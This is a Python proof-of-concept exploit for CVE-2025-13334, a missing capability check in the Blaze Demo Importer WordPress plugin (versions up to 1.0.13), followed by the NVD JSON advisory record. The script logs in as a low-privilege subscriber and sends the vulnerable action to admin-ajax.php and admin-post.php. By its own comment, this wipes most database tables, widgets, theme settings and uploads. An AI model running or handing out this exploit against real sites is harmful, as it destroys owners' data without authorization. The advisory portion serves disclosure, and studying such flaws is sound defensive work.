CVE-2025-13334

import requests # CVE-2025-13334 PoC - Blaze Demo Importer Unauthorized Database Reset # Target: WordPress site with Blaze Demo Importer plugin <= 1.0.13 target_url = "http://target-wordpress-site.com" # Authentication credentials (subscriber level or higher) username = "attacker" password = "password123" # Create session session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } session.post(login_url, data=login_data) # Step 2: Trigger the vulnerable function via admin-ajax.php ajax_url = f"{target_url}/wp-admin/admin-ajax.php" data = { "action": "blaze_demo_importer_install_demo" } # Step 3: Send exploit request response = session.post(ajax_url, data=data) # Step 4: Alternative via admin-post.php post_url = f"{target_url}/wp-admin/admin-post.php" post_data = { "action": "blaze_demo_importer_install_demo" } response = session.post(post_url, data=post_data) print(f"Response Status: {response.status_code}") print(f"Response: {response.text}") # This will truncate all database tables (except wp_options, wp_usermeta, wp_users) # and delete all sidebar widgets, theme modifications, and uploads folder content

{"cve": {"id": "CVE-2025-13334", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:41.323", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Blaze Demo Importer plugin for WordPress is vulnerable to unauthorized database resets and file deletion due to a missing capability check on the \"blaze_demo_importer_install_demo\" function in all versions up to, and including, 1.0.13. This makes it possible for authenticated attackers, with subscriber level access and above, to reset the database by truncating all tables (except options, usermeta, and users), delete all sidebar widgets, theme modifications, and content of the uploads folder."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/blaze-demo-importer/tags/1.0.13/blaze-demo-importer.php?marks=67-89#L68", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d83cd6a0-d69c-4e6c-b76f-00c398b5f7e6?source=cve", "source": "[email protected]"}]}}